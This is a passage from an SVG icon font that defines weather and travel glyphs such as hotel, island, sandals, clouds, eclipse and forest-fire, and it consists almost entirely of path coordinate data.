10l-24 21c-7 6-12 4-17-2-5-6-11-13-18-18-8-6-16-6-24 0-9 6-12 15-16 23-11 25-21 51-32 75-3 8-7 15-13 21-7 6-15 5-20-2-2-4-3-7-4-11-13-38-23-76-34-114-6-24-2-54-21-71-5-5-12 0-17 4-17 11-32 25-47 39-9 9-13 10-23 1-9-8-18-13-29-15-5-1-8 0-10 3-2 4 2 6 5 7 14 5 26 13 37 22 5 3 10 0 14-1 9-3 16-10 23-18 9-11 18-22 29-32 5-4 16-12 17-9 2 2 8 16 8 19 11 45 13 78 24 123 5 21 9 42 17 61 9 23 22 25 39 8 12-12 20-26 26-42 9-25 21-50 26-77 1-4 3-9 8-10 6-1 10 2 13 6 5 5 7 11 9 17 10 24 17 26 35 7 11-11 21-21 36-24 5-1 8-4 9-10 1-8 3-16 5-25 0-2 0-6 3-6 5-1 5 3 6 6 3 5 6 11 9 18 1-2 2-4 2-5 2-17 5-33 5-50 0-5 0-11 1-16 1-5 5-9 10-9 5-1 7 3 9 7 1 3 3 7 3 10 3 19 5 38 8 58 1 2-1 8 5 7 4-1 4-5 4-9-2-38-1-76-3-115-1-6 0-12 1-18 1-4 2-9 7-10 4-1 7 4 9 8 4 8 5 18 6 27l9 96c0 2 0 6 4 6 3 0 4-3 4-6 0-4 0-8 0-11-1-22-2-43-2-65 0-6 1-12 9-13 7-1 8 6 9 11 3 14 5 27 8 41 0 2 1 5 3 5 3 0 3-3 3-5 0-11-1-22-3-32-6-22-12-43-17-65-3-15-6-29-3-44 1-5 2-10 8-11 4-1 7 4 9 8 6 10 10 20 13 31 4 17 7 34 12 51 6 18 17 23 34 15 4-1 8-5 10-1 1 1 0 3 0 5z m-404-56c5 1 8 2 11 2 3 1 7 1 6 6 0 3-4 4-7 4-3 0-6 0-8 0-13-3-24 2-33 12 4 3 13 2 13 9-1 7-8 9-14 11-14 6-39 25-45 11-5-14 24-18 38-29-7-1-12-1-17-1-20 0-39-2-58-5-3 0-8 0-8-4 0-3 4-3 7-4 4-1 8-2 12-2 27-3 54-2 81-1 5 0 16 0 13-6-1-3-4-2-6-2l-75-6c-15-1-31-2-46-6-2 0-4-1-4-3-1-2 2-3 4-4 6-1 13-2 19-2 44 0 88 0 131 1 3 0 10-3 9 2 0 9-14 11-23 17z" />
<glyph glyph-name="hill" horiz-adv-x="1000" unicode="&#xee48;" d="M66 145l283 434c9 15 31 14 39-2l58-110c9-17 33-16 41 1l26 60c8 17 31 18 40 3l121-198c7-12 22-15 32-7l32 23c10 6 23 5 30-4l164-197c13-15 2-37-17-37h-830c-18 0-29 19-19 34z" />
<glyph glyph-name="hotel" horiz-adv-x="1000" unicode="&#xee49;" d="M153 390c0 8-3 16-9 23s-15 11-24 11-17-4-23-11-10-15-10-23v-478h66v135h694v-134h66v201h-760v276z m62-33c-12-12-18-27-18-44s6-31 18-43c12-12 26-18 42-18s32 6 44 18c12 12 19 26 19 43s-7 31-19 44c-12 12-27 18-44 18s-30-6-42-18z m650-63l-483 48c-8 0-16-3-21-9-6-6-9-14-9-22v-95h-123c-20 0-31-9-31-26 0-17 11-25 31-25h684v82c0 13-5 24-14 32-9 8-21 13-34 15z m-373 414c2 2 5 4 8 6 17-13 33-26 49-39 88-71 175-141 262-211h106c-2 1-4 3-5 5-63 50-125 100-188 150l-197 158c-17 14-37 14-54 0-73-58-145-116-218-174-55-45-111-90-167-135-2-2-4-3-5-4h106c101 81 202 163 303 244z" />
<glyph glyph-name="island-alt" horiz-adv-x="1000" unicode="&#xee4a;" d="M500 97c6 0 12 1 17 1 5 56 8 109 15 161 7 52 17 104 30 154 13 51 31 100 47 149-78-145-121-299-131-464 9 0 16-1 22-1z m-225 135c4 53 16 102 40 148 51-38 103-68 169-73-26 38-61 60-105 75 31 10 55 24 74 50-24 6-42 3-61-1-19-3-36-13-52-19 8 25 18 52 27 82-45-10-61-46-54-106-55 23-97 17-125-20 29-3 56-6 82-9-29-52-28-103 5-127z m322 387c-84 12-100 11-130-9-41-25-63-78-51-118 53 58 119 93 197 104 6 1 16-3 19-8 26-42 45-88 50-137 3-35 0-69 0-106 30 21 45 49 49 82 7 60-17 107-61 147 79-42 141-103 199-176-16 106-95 181-213 203 94 5 181-10 266-39-33 37-73 62-121 74-48 13-94 8-141-14 36 71 1 158-64 166 35-78 43-125 31-181-2 5-4 8-5 12-24 84-97 134-184 128-46-4-93-40-102-79 117 17 205 1 261-49z m-188-544c-106-12-300-103-331-163 29 8 57 15 84 26 12 5 19 7 31 1 60-32 121-33 181 0 12 6 20 5 31-1 61-32 122-31 183 2 9 5 16 5 25 0 61-33 123-34 185-1 11 6 18 6 29 0 26-15 55-23 86-21-145 128-313 178-504 157z m45 22c-20 99-60 184-120 261 46-82 75-170 83-265 13 1 24 3 37 4z" />
<glyph glyph-name="island" horiz-adv-x="1000" unicode="&#xee4b;" d="M928 378c-17 93-73 147-165 168-127 30-225-58-209-188 11-84 86-135 157-107-86 46-107 79-90 138 16 51 56 80 107 77 57-4 105-47 112-110-27 28-53 49-96 53 54-45 85-94 76-168-17 23-23 47-46 58 7-61-59-152-119-166-6-1-13 0-19 1-8 2-16 4-23 5l-347 78c-1 6-10 12-12 20-2 6-4 15-15 12-16-5-32-4-48-1-4 0-7 2-9-4-1-2-2-5-2-8l-34 8c-3 0-8 1-13 3-18 6-23-2-22-19 0-42 1-83-1-124-1-26 7-33 33-33 237 1 474 1 711 0 27-1 40 10 49 33 35 89 43 180 25 274z m-720 119c9 1 10 7 14 12 9 15 23 20 38 12 11-5 20-6 32-5 18 2 31-13 32-32 0-7-2-13 5-18 31-25 62-51 92-85-1 30-7 54-20 75-7 13-18 22-33 25-4 1-11-1-11 6 1 7 8 6 13 6 35 2 69 2 99-22-7 34-31 50-60 58-22 6-44 10-66 9-5 0-13-1-15 5-2 8 7 9 12 11 30 15 61 22 96 13-28 34-70 43-105 23-11-6-21-15-31-23-7-5-10-6-14 4-16 44-56 65-107 57 25-15 43-33 59-54 2-4 7-7 3-12-4-4-8-1-11 0-30 10-61 15-92 12-37-2-68-22-75-50 38 24 79 31 122 23 5-1 9-2 10-6 2-4-3-6-6-9-13-8-27-16-39-25-30-23-55-50-63-88 3 2 6 6 8 8 31 35 65 64 113 70z m-13-185c-19-3-11-29-11-43 0-21 22-13 35-13 24-1 25 1 23 27-2 31-2 34-47 29z m25 52c-5 0-10 1-14 2-4 0-7 1-8-3-3-12-8-24-6-35 1-10 16-6 24-8 11 3 26-3 27 18 1 25 2 25-23 26z m34 42c1 21-16 3-20 9-20 1-29-9-31-30-2-15 10-10 16-11 24-3 34 6 35 32z m16 80c0-15 8-23 22-24 13 0 22 9 22 22 1 13-7 21-21 22-14 1-21-7-23-20z m-1-29c-2 14-11 1-16 4-17-1-36-17-33-29 3-13 17-6 26-7 11 0 25 19 23 32z m-21 13c21 2 9 23 16 34 5 7-8 9-15 11-13-1-21-8-22-21-1-14 8-24 21-24z" />
<glyph glyph-name="sandals-female" horiz-adv-x="1000" unicode="&#xee4c;" d="M280 664c-19 0-33-14-33-32-1-19 14-34 32-34 19 0 34 14 34 33 0 19-14 33-33 33z m164-464c-11 28-21 57-29 86-1-3-1-7-1-10 0-10-1-20-7-29-11-14-26-13-34 3-3 4-4 9-5 14-4 25-1 50 3 75 8 41 18 80 18 122-1 30-3 59-17 86-8 16-17 31-18 50 0 1-1 3-2 5-3 5-2 8 4 10 1 1 3 2 5 4 5 7 9 4 14-1 38-36 56-80 57-132 1-9 0-19 0-29 2 4 3 8 4 12 8 44 8 86-11 128-1 3-1 6-1 10 0 58-18 109-62 149-35 33-78 44-124 25-112-45-157-162-136-260 4-19 9-38 16-59 1 14 0 26 2 37 8 50 35 88 72 120 7 5 9-3 14-5 4-1 4-3 3-7-5-12-7-24-6-36 0-6-1-11-5-16-34-48-33-130 0-176 15-20 28-41 41-63 15-23 26-47 29-75 1-12-2-23-9-32-10-13-27-11-34 4-2 6-4 12-5 18-5 40-26 72-51 105 5-18 9-34 13-50 12-52 17-105 24-157 5-33 15-62 41-84 46-37 97-40 150-16 48 22 72 70 64 122-3 18-11 35-17 52z m-100 353c-1-5-4-7-10-7-20 2-37 8-50 24-4 5-6 3-8 0-13-15-30-22-49-24-6 0-10 1-11 8-1 7-3 13-3 19 1 13 3 25 10 35 3 5 2 7-3 9-18 7-30 21-37 39-3 6-1 9 4 12 17 10 34 15 54 10 5-1 7 0 7 6 1 20 11 35 26 47 4 5 8 5 13 0 14-12 23-27 25-46 1-6 2-8 10-7 19 5 36 0 52-10 5-3 6-6 4-11-8-18-19-32-37-40-5-2-7-4-4-10 11-17 11-35 7-54z m557-60c-10 81-50 142-123 180-46 24-96 19-135-15-45-39-64-89-66-146-1-20 2-40 9-60 2 3 3 5 4 7 10 19 23 36 38 50 11 10 11 9 22 1 4-2 5-4 3-8-5-10-8-21-8-32 1-4-1-7-3-10-10-13-17-28-21-45-11-40-9-81-3-123 5-30 13-61 14-92 1-18 1-37-6-55-3-6-7-13-15-13-9 0-15 4-20 11-6 9-7 20-6 30 1 13 2 26 3 39l-2 0-3-11c-11-43-27-83-44-124-8-20-12-41-8-63 8-50 39-80 85-95 55-17 111-1 144 40 16 20 22 44 26 69 7 40 11 81 19 121 5 20 9 39 15 61-20-25-34-50-41-79-2-9-3-19-7-28-3-6-7-11-15-12-8-1-15 2-19 9-6 8-9 18-8 28 1 18 7 36 15 52 15 31 35 58 55 85 38 50 38 135 1 183-2 3-3 6-2 9 2 13 1 26-4 38-2 6 0 8 4 11 7 5 11 4 16-1 6-7 12-12 18-18 35-39 54-83 50-136-1-15-5-30-9-45 16 30 24 63 21 97 0 4 0 8 1 12 7 26 9 52 5 78z m-78 56c-8-18-20-31-38-38-6-2-7-4-4-10 10-16 10-34 5-53-1-6-5-8-11-7-20 2-36 10-49 26-1 1-2 3-3 4-14-17-31-25-52-27-8-1-12 2-13 10-3 18-2 36 9 51 4 6 2 8-3 10-18 9-29 23-36 41-2 6 0 9 5 11 16 10 34 14 52 9 7-2 9 0 10 6 2 20 13 35 29 46 4 3 6 3 10 0 14-13 24-28 25-48 0-7 2-9 9-7 19 4 36-2 52-12 5-3 6-7 3-12z m-98 12c-18 0-33-15-33-34-1-18 15-33 34-33 17 0 32 15 32 33 0 18-15 33-33 34z" />
<glyph glyph-name="sandals-male" horiz-adv-x="1000" unicode="&#xee4d;" d="M341 775c-103 30-224-32-261-133-26-72-21-147 2-216 43-126 62-256 89-385 19-86 80-132 166-122 82 10 132 70 120 160-17 131-4 260 4 391 0 45 1 91 0 137-4 83-51 147-120 168z m71-501c-4-19-17-39-41-30-19 7-21 26-12 42 61 103 17 192-39 278-15 23-31 60-55 57-23-3-30-43-41-68-31-72-54-146-46-225 3-34 16-59 52-67 17-3 30-11 21-31-7-17-22-24-41-15-31 15-45 45-55 75-11 33-14 68-11 99 0 68 12 130 37 190 9 23 21 45 37 65 39 48 55 52 97 5 95-107 127-234 97-375z m508 368c-36 101-158 163-261 133-69-21-116-85-120-168-1-46 0-92 0-137 8-131 21-260 4-391-12-90 38-150 120-160 86-10 147 36 166 122 27 129 46 259 89 385 23 69 28 144 2 216z m-75-352c-10-30-24-60-55-75-18-9-33-2-41 15-9 20 4 28 21 31 36 8 49 33 52 67 8 80-15 153-46 225-10 25-18 65-41 68-24 3-40-34-54-57-56-86-100-175-40-278 9-16 8-35-12-42-24-9-36 11-40 30-30 141 1 268 97 375 41 47 57 43 97-5 16-20 27-42 37-65 24-60 37-122 36-190 3-31 0-66-11-99z" />
<glyph glyph-name="travelling" horiz-adv-x="1000" unicode="&#xee4e;" d="M845 425c-19 0-37 1-56 0-12-1-19 4-26 14-21 34-44 66-65 100-13 21-31 30-54 32-4 1-9 2-13 2-19 1-37 8-55 5-51-6-102-13-153-20-19-3-32-13-38-31-11-33-21-67-32-100-2-8-5-15-3-24 4-18 22-36 39-37 24-2 41 10 48 32l22 67c2 4 3 8 9 9 11 1 23 3 34 5 10 2 12-1 9-11-13-51-26-103-39-155-12-44-1-72 37-98 44-30 88-61 133-91 7-4 10-10 12-19 8-50 16-101 25-152 5-26 28-44 52-40 27 4 44 28 40 56-10 60-21 120-31 181-2 14-10 25-22 33-30 22-59 44-90 64-8 6-9 12-7 21 11 49 21 99 32 148 1 6 3 12 5 22 16-26 32-48 46-71 11-20 27-32 51-32 30 1 59 0 89 1 28 0 48 19 48 44 0 26-20 45-47 45z m-484-87c-12-1-18-10-21-20-7-25-14-49-20-74-2-10-6-10-15-8-25 6-48 15-67 16-42 0-72-22-82-56-16-58-31-116-47-174-6-23 7-45 30-51 15-4 31-8 46-12 7-2 9 0 10 7 6 52 57 84 106 65 8-3 11-2 13 6 8 34 17 67 26 100 15 57 30 114 45 172 4 17-7 30-24 29z m290 269c49 0 90 41 90 91 0 49-41 90-90 90-49 0-90-41-90-89 0-51 39-91 90-92z m-132-440c-25 17-53 30-70 60-23-88-45-172-68-257-2-7-2-14 0-21 5-22 23-36 45-36 22 0 39 14 45 38l54 200c2 7 0 11-6 16z m-245-165c-24 1-45-20-45-44-1-24 19-45 44-45 24-1 45 20 45 44 1 24-20 45-44 45z" />
<glyph glyph-name="breakdown" horiz-adv-x="1000" unicode="&#xee4f;" d="M883-30c-102 108-146 242-171 385-5 32 0 71-17 97-14 23-43 14-69 12h0c-5 0-9 0-13 0h-41c2 74 15 145 42 213-36-66-56-137-62-213h-13c-6 37-37 104-55 117 21-37 34-75 39-117h-23c-2 0-4 0-6 0l-81 0-48-50 58-25-41-56 65-37-44-30 45-47-56-70 46-82-14-8-51 92 53 67-49 51 39 26-58 34 39 54-61 26 54 55h-53c-27 0-53 0-80 0h-27l0 0c-39 0-79 1-118 1-36 1-50-7-49-46 2-152 2-305-1-457 0-36 11-44 46-44 262 1 523 0 785 1 11 0 13-1 44 1-15 14-39 35-54 50z m-273 732c-23 8-44 10-63-3-20-13-27-31-25-56 26 28 57 44 94 50 2 0 7-2 9-4 12-20 21-41 23-65 2-16 0-32 0-49 15 10 21 23 23 38 4 28-8 51-28 70 37-20 66-49 93-83-7 50-45 85-100 95 44 2 85-5 125-18-35 34-75 49-123 29 17 32 0 73-30 77 16-37 20-59 14-85-1 2-1 4-2 5-11 40-46 64-87 61-21-2-43-19-48-37 56 8 97 0 125-25z m-155-120c-14-23-14-46 2-61 2 25 7 49 19 71 23-19 48-33 79-35-12 18-28 28-49 35 14 5 26 11 34 23-19 4-23 4-53-9 4 12 9 25 14 40-14-4-22-11-24-21-3-10-3-20-4-29-23 10-42 7-56-9 6-2 12-4 19-4 6-1 13-1 19-1z" />
<glyph glyph-name="celsius" horiz-adv-x="1000" unicode="&#xee50;" d="M323 648c0 72-59 130-130 130s-130-58-130-130 58-130 130-130c71 0 130 58 130 130z m-130-62c-35 0-63 28-63 62 0 34 28 62 63 62 34 0 62-28 62-62 0-34-28-62-62-62z m578-485c-32-13-65-20-99-20-35 0-68 6-99 20-30 13-57 31-80 54-23 23-41 49-54 80-14 30-20 63-20 97 0 35 6 68 20 99 13 30 31 57 54 80 23 22 50 40 80 54 31 13 64 20 99 20 34 0 67-7 99-21 32-13 59-32 82-57l84 138c-36 32-78 56-123 73-46 17-94 25-143 25-37 0-73-5-108-14-35-10-68-24-98-42-31-18-58-39-83-64-25-25-47-53-65-84-18-30-31-63-41-98-10-35-15-71-15-109s5-73 15-108c10-35 23-68 41-98 18-31 40-58 65-83 25-25 52-47 83-65 30-18 63-32 98-41 35-10 71-15 108-15 49 0 97 9 143 25 45 17 87 42 123 74l-84 138c-23-25-50-44-82-58z" />
<glyph glyph-name="clouds" horiz-adv-x="1000" unicode="&#xee51;" d="M892 375c-47 46-103 60-166 36-12-4-16-4-22 9-36 89-112 143-203 147-42 20-91 27-142 21-103-12-185-94-204-205-1-7 0-15-8-19-19-7-33-18-45-32l0 1s-87-83-2-177c2-3 5-6 7-8l1-2 0 1c21-20 48-32 80-35 23-2 90-2 132-2 24 0 48 1 72 1l274 0c42 0 80-1 117 0 67 3 115 35 142 95 25 58 12 125-33 169z m-627-5c-1-6 0-14-8-17-17-8-31-18-42-31l-1 0s-82-78-1-169c2-2 4-5 7-7l1-1 0 0c19-19 45-31 76-33 4-1 8-1 12-1-23 0-50 1-53 1-31 3-56 14-76 33l0 0-1 1c-3 2-5 5-7 8-81 90 2 169 2 169l0-1c11 13 25 24 43 31 7 3 6 11 8 18 18 105 96 183 195 195 24 3 49 4 72 1-11 0-21 0-32-1-99-12-177-90-195-196z" />
<glyph glyph-name="cloudy" horiz-adv-x="1000" unicode="&#xee52;" d="M566 399c-8-3-11-3-15 6-28 69-92 107-166 99-67-8-119-61-132-133-1-4 0-9-5-11-12-6-21-13-29-21l0 0s-56-53-1-114c1-2 3-4 4-6l1 0 0 0c13-13 31-21 51-23 22-2 44 0 65 0l186 0c28 0 54-1 80 0 45 2 77 23 95 65 17 39 9 84-22 114-32 31-70 40-112 24z m-416-156c-1 0-2 0-3 2-7 16-22 25-39 23-16-2-28-14-31-31-1-1 0-3-2-3-2-1-5-3-6-5 0 0-14-13-1-27 1 0 1-1 1-1l1 0c3-3 7-5 12-6 5 0 10 0 15 0l44 0c7 0 13 0 19 0 10 1 18 6 22 15 5 10 3 20-5 27-7 8-16 10-27 6z m438 192l0 0c3-4 8-5 13-6 5 0 10 0 15 0l46 0c7 0 13 0 19 0 11 1 19 6 23 16 4 9 2 20-5 28-8 7-17 9-27 6-2-1-3-1-4 1-7 17-22 26-40 24-17-2-29-15-32-32-1-1 0-2-2-3-3-1-5-3-7-5 0 0-13-13 0-28 0 0 1-1 1-1z m337-157c-12 12-27 15-44 9-3-1-5-1-6 3-11 27-37 42-66 39-26-3-47-24-52-53 0-2 0-4-2-5-5-2-9-4-12-8v0s-22-21 0-45l2-2c0 0 0 0 0-1 5-5 12-8 20-8 9-1 17-1 26-1l74 0c11 0 21 0 31 0 18 1 31 10 38 26 7 16 4 34-9 46z" />
<glyph glyph-name="dust" horiz-adv-x="1000" unicode="&#xee53;" d="M886 225c-53 52-117 67-188 41-13-5-19-6-25 10-46 115-154 179-276 164-112-13-200-101-221-221-1-7 0-16-9-20-20-8-35-20-48-34l0 0s-94-89-2-192c2-3 5-6 8-8 0-1 0-1 1-2l0 1c22-22 51-35 86-38 36-3 72 0 108-1l310 0c48 0 90-1 133 1 75 2 130 39 160 108 29 65 14 141-37 191z m-258 416c14-1 29 12 29 27 1 15-11 29-26 29-15 1-29-11-30-26-1-15 12-29 27-30z m179-243c-15 0-28-13-29-28 0-15 14-28 28-29 15 0 29 14 29 28 0 15-13 28-28 29z m-76 188c14 0 28 13 28 28 1 15-13 28-28 29-15 0-28-13-28-28 0-15 13-28 28-29z m-561 134c16 0 28 12 28 28 0 16-12 28-28 27-17 0-26-10-27-26-1-16 11-28 27-29z m395-37c16 2 26 11 27 27 0 17-12 29-28 29-16 0-28-12-27-28 0-16 12-29 28-28z m-254-114c15 0 27 13 26 29 0 15-13 27-29 25-17-1-26-11-26-27 0-16 12-28 29-27z m-93-127c16-1 29 10 31 25 1 16-10 29-26 30-17 0-27-8-29-24-3-16 8-29 24-31z m568 17c16 1 29 14 28 29-1 15-14 27-30 26-17-1-25-12-26-28-1-14 13-27 28-27z m-224 41c1-15 14-29 29-27 16 2 26 11 26 28 1 15-12 28-27 28-16 0-28-14-28-29z m-170 22c0-17 9-26 25-28 15-2 29 11 30 26 1 15-12 29-27 30-15 0-29-12-28-28z m-274 93c0 17-9 27-26 28-16 1-29-10-29-26-1-15 11-28 27-29 16 0 29 12 28 27z m385-8c16 2 25 11 26 28 0 16-12 28-28 28-16-1-28-13-28-29 1-15 14-28 30-27z m-118 40c15-2 28 11 29 27 0 15-12 29-27 29s-28-12-28-28c0-17 10-26 26-28z m462 35c16 1 26 10 27 26 1 16-12 29-27 29-16 1-28-12-28-28 0-16 12-28 28-27z m-757-266c-1-15 12-28 28-29 15 0 28 13 29 28 0 15-13 28-29 27-17 0-26-10-28-26z" />
<glyph glyph-name="eclipse" horiz-adv-x="1000" unicode="&#xee54;" d="M900 396c-24 130-160 216-288 182-7-3-15-3-22 0-39 11-78 11-116 0-91-27-150-86-170-178-20-92 9-171 81-232 49-41 106-59 170-52 28 3 56 12 84 1 4-2 9-2 13-2 105-8 205 59 239 158 6 18 9 36 13 54v46c-2 8-3 15-4 23z m-402-209c-60 0-128 77-132 153-6 95 65 162 133 174-43-47-66-101-66-164 0-62 23-116 65-163z m2 501c0-20 15-35 33-35 20 0 34 14 34 35 1 19 0 38 1 57 1 21-7 35-26 43h-17c-18-8-26-22-25-43 1-19 0-38 0-57z m-269-338c0 19-15 33-34 34-19 0-39-1-59 0-20 1-34-7-42-26v-16c8-19 22-27 43-26 19 1 39 0 58 1 19 0 34 14 34 33z m336-337c0 19-14 34-33 34-19 0-34-14-34-34 0-19 1-38 0-57-1-21 6-35 25-43h17c19 8 27 22 25 43-1 19 0 38 0 57z m-257 130c-14 6-27 4-37-6-16-16-32-32-48-48-14-15-14-35 0-49 13-13 33-12 48 2 16 15 31 31 47 46 6 7 9 14 9 20 1 17-7 29-19 35z m-38 421c14-13 35-13 48 1 13 13 13 33-1 47-15 16-31 32-47 47-6 7-14 10-22 11-15 0-27-8-32-20-6-13-4-27 6-38 16-16 32-32 48-48z" />
<glyph glyph-name="fahrenheit" horiz-adv-x="1000" unicode="&#xee55;" d="M938 573v160h-560v-799h160v320h240v159h-240v160h400z m-749 193c-70 0-126-57-126-127s56-127 126-127 127 57 127 127-57 127-127 127z m0-187c-33 0-60 27-60 60s27 61 60 61 61-27 61-61-27-60-61-60z" />
<glyph glyph-name="forest-fire" horiz-adv-x="1000" unicode="&#xee56;" d="M425 388c48-34 59-27 85 22l2-15c2-10 1-12 7-21 7-10 18-14 20-15 18-2 34 6 50 16 67 42 82 139 26 206-52 64-72 128-19 207-50-8-76-36-91-73-19-47-10-92 9-136 8-19 11-38-8-52-18-14-38-19-60-9-22 9-29 27-27 49 1 17 6 33 10 51-86-57-87-170-4-230z m452-115c20 44 5 93-38 122 2-11 5-20 6-30 2-16 1-32-16-39-15-7-32-7-46 4-15 12-10 28-5 42 4 12 9 24 12 36 10 51-18 96-70 109 34-54 24-102-15-146-7-8-12-17-17-25-31-53 19-148 77-136-15-44-53-71-82-104 13-17 33-6 47-17-10-26-39-35-50-59 14-7 31 1 43-21-14-10-29-21-51-38 28-4 46-6 64-10 8-2 23 2 23-13 0-15-14-12-23-12-62 0-124 0-186 0-12 0-22 1-23 17-1 17 7 20 22 22 36 6 74 3 110 20-23 28-54 43-74 73l74 17c-28 34-66 54-86 90 27 13 59 6 86 22-49 45-100 86-129 143v0l-17 32c-3 4-6 11-10 1-33-72-88-125-151-178 32-7 60-12 103-21-38-33-68-60-102-89 29-7 50-11 74-16-18-32-51-45-70-75 36-15 73-13 109-19 12-2 22-2 21-19 0-15-7-20-21-20-66 1-131 0-197 0-8 0-16 0-17 11 0 11 8 12 15 13 21 3 41 6 64 10-11 22-33 29-40 51 14 3 26 6 40 10-14 25-43 33-50 59 15 10 35-2 47 17-30 30-63 58-81 98 46-1 88 30 101 75 11 40-6 85-44 107 3-9 5-16 7-23 4-18 2-34-14-44-16-10-34-7-50 4-15 12-8 27-3 42 4 9 7 19 9 28 12 60-13 103-65 114 29-69 28-79-18-144-30-44-33-85-6-126 16-24 35-44 68-28-14-45-51-73-83-105 14-15 34-6 60-20-25-19-44-34-65-49 17-14 34-5 44-20-12-13-25-27-40-43 21-11 42-7 61-13 8-2 20 0 18-13-1-12-12-11-21-11-25 0-50 0-76 0-7 0-16-1-16-11 0-10 8-12 16-11l19-1 679 0c8 0 16-1 23 0s16 0 16 11-7 11-15 12c-14 0-28-1-42 0-9 1-25-6-26 12 0 16 15 10 23 13 17 5 37 1 54 12-11 19-32 27-39 49 15 3 26 5 41 8-14 25-43 34-51 61 16 9 35-3 48 17-38 30-67 68-92 109 44-12 89 11 109 56z" />
<glyph glyph-name="full-night" horiz-adv-x="1000" unicode="&#xee57;" d="M578 180c-11-4-15-4-20 8-36 90-121 140-217 129-87-10-157-79-173-173-1-6 0-13-7-16-15-7-28-16-38-27l0 0s-74-70-1-150c2-3 3-5 6-7l1-1 0 0c17-17 40-27 67-29 28-3 57 0 85-1l244 0c37 0 70-1 104 0 59 2 101 31 125 85 23 51 12 111-28 150-42 41-92 53-148 32z m128 202c-49-11-95-3-137 25-35 23-59 56-70 96-18 63-5 119 34 171-43-8-78-30-107-61-45-47-67-105-64-170 2-26 7-50 15-72 86-23 162-74 220-147 9 0 17 1 26 2 136 18 208 144 197 238-28-44-65-72-114-82z m-391 317l25-7c3 0 5-2 6-4l9-25c2-6 10-7 14-2l14 22c1 3 4 4 6 4l26 1c7 0 10 8 6 13l-17 20c-1 2-2 5-1 7l7 26c2 6-4 11-10 9l-25-10c-2-1-5 0-7 1l-22 15c-5 4-12 0-12-7l2-26c0-3-1-5-3-7l-21-16c-5-4-4-12 3-14z m593-198l-17 20c-1 2-2 4-1 7l7 25c2 7-4 12-10 10l-25-10c-2-1-5 0-7 1l-22 15c-5 3-12-1-12-7l2-27c0-2-1-5-3-6l-21-16c-5-4-4-13 3-14l25-7c3-1 5-2 6-5l9-25c2-6 10-7 14-1l14 22c1 2 4 3 6 4l27 0c6 1 9 9 5 14z m-299 28c2 0 3-1 4-3l6-16c1-4 7-5 9-1l10 14c1 2 2 3 4 3l17 0c4 1 7 6 4 9l-11 13c-1 2-2 4-1 5l5 17c1 4-3 8-7 6l-16-6c-2-1-4-1-5 0l-15 10c-3 3-8 0-8-4l1-18c1-2 0-3-2-4l-13-11c-4-3-3-8 2-9l16-5z m159 77c1-1 2-2 2-3l4-11c1-3 5-3 6 0l7 10c0 1 2 1 3 1l12 1c3 0 4 3 2 5l-7 10c-1 1-1 2-1 3l3 11c1 3-2 6-5 5l-11-5c-1 0-2 0-3 1l-10 6c-2 2-5 0-5-3l1-12c0-1-1-2-2-3l-9-7c-2-2-2-5 1-6l12-3z m-226 138c1 0 2-1 3-3l5-13c1-4 6-4 8-1l8 12c0 1 2 2 3 2l15 1c4 0 6 4 3 7l-9 11c-1 1-1 3-1 4l4 14c1 4-3 7-6 6l-14-6c-1 0-3 0-4 1l-12 8c-3 2-7 0-7-4l1-15c0-1 0-3-2-4l-11-9c-3-2-2-6 1-7l15-4z m-231-179c-2-2-1-5 1-5l10-3c1 0 2-1 2-2l3-9c1-3 4-3 6-1l5 9c1 1 2 1 3 1l10 0c2 1 4 3 2 5l-6 8c-1 1-1 2-1 3l3 10c1 2-2 4-4 3l-10-3c-1-1-2-1-2 0l-9 6c-2 1-5-1-4-3l0-10c0-1 0-2-1-3l-8-6z" />
<glyph glyph-name="full-sunny" horiz-adv-x="1000" unicode="&#xee58;" d="M662 219c-12-5-17-5-22 8-42 104-139 161-248 148-101-11-180-91-198-198-2-7-1-15-9-18-17-8-31-18-43-31v0s-84-80-2-172c3-2 5-5 7-7l1-2 0 1c20-20 46-31 77-34 33-3 65 0 97-1l279 0c42 0 81-1 119 1 67 2 116 34 143 96 26 59 13 127-32 172-48 47-106 60-169 37z m-348 255c-4-10-6-19-8-28 151 24 294-25 396-133 3 8 6 15 9 23 38 110-20 229-130 267-110 38-230-20-267-129z m550 28c-32-5-64-11-95-18-13-3-21-15-21-27-1-13 8-25 20-30 4-2 9-2 13-1 31 6 62 11 93 18 16 3 25 18 22 34-3 15-17 27-32 24z m-269 124c16-5 33 3 39 19 5 14 9 28 14 42l14 41 1 2c5 16-3 32-19 38-16 5-33-3-38-19-10-28-20-56-29-84-6-17 2-34 18-39z m-433-133c14-5 28-10 43-15l41-14c16-5 32 2 38 17 6 16 0 33-16 39-30 11-59 21-88 30-16 5-33-4-38-19-5-16 4-32 20-38z m703-178c-30 11-59 21-88 30-16 6-33-4-38-19-4-16 4-32 20-38 14-5 28-9 42-14l42-15c16-5 32 2 38 17 6 16 0 33-16 39z m-157 231c10-3 19-2 27 5 24 20 48 40 71 61 12 11 12 29 2 41-10 12-28 15-40 5-25-20-49-41-72-63-16-15-9-41 12-49z m-257 95c22-7 43 10 39 34-5 29-11 59-17 88-4 18-19 27-36 24-16-3-27-18-23-35 5-30 11-59 17-88 2-11 9-19 20-23z m-140-53c4-4 8-7 12-8 14-5 28-1 36 10 8 11 7 26-2 37-19 23-39 45-59 68-12 13-30 14-43 3-13-11-14-29-2-43 19-22 39-45 58-67z" />
<glyph glyph-name="hail-night" horiz-adv-x="1000" unicode="&#xee59;" d="M821 399c-45 44-99 57-159 35-12-4-16-5-21 8-40 98-131 152-234 140-95-11-170-86-187-188-1-6 0-13-8-17-16-7-30-17-40-29l-1 0s-79-75-1-162c2-2 4-5 6-7 1 0 1-1 1-1l0 0c19-18 43-29 73-31 30-3 61-1 92-1l262 0c40 0 76-1 112 0 64 2 110 33 136 91 24 56 12 120-31 162z m-248 304c-26-21-41-48-43-82-1-13 0-25 3-37 41-17 76-47 101-88 4 0 8-1 13-1 70 1 114 60 114 108-17-21-37-32-62-35-26-2-48 5-67 22-17 14-27 32-30 53-5 32 5 60 28 84-22-2-41-10-57-24z m-38 45c1 0 2-1 2-2l3-13c1-4 5-5 7-2l8 10c1 1 2 2 4 2l13-2c3 0 6 4 4 6l-7 12c-1 1-1 2-1 3l6 13c1 3-2 6-5 5l-13-3c-1 0-2 0-3 1l-11 9c-2 2-6 0-6-3l-1-13c0-2-1-3-2-4l-11-6c-3-2-3-6 0-8l13-5z m219-127l13-5c1 0 2-1 2-3l3-13c1-3 5-4 7-1l8 10c1 1 2 2 4 1l13-1c3 0 6 3 4 6l-7 12c-1 1-1 2-1 3l6 12c1 4-2 7-5 6l-13-3c-1-1-2 0-3 1l-10 8c-3 3-7 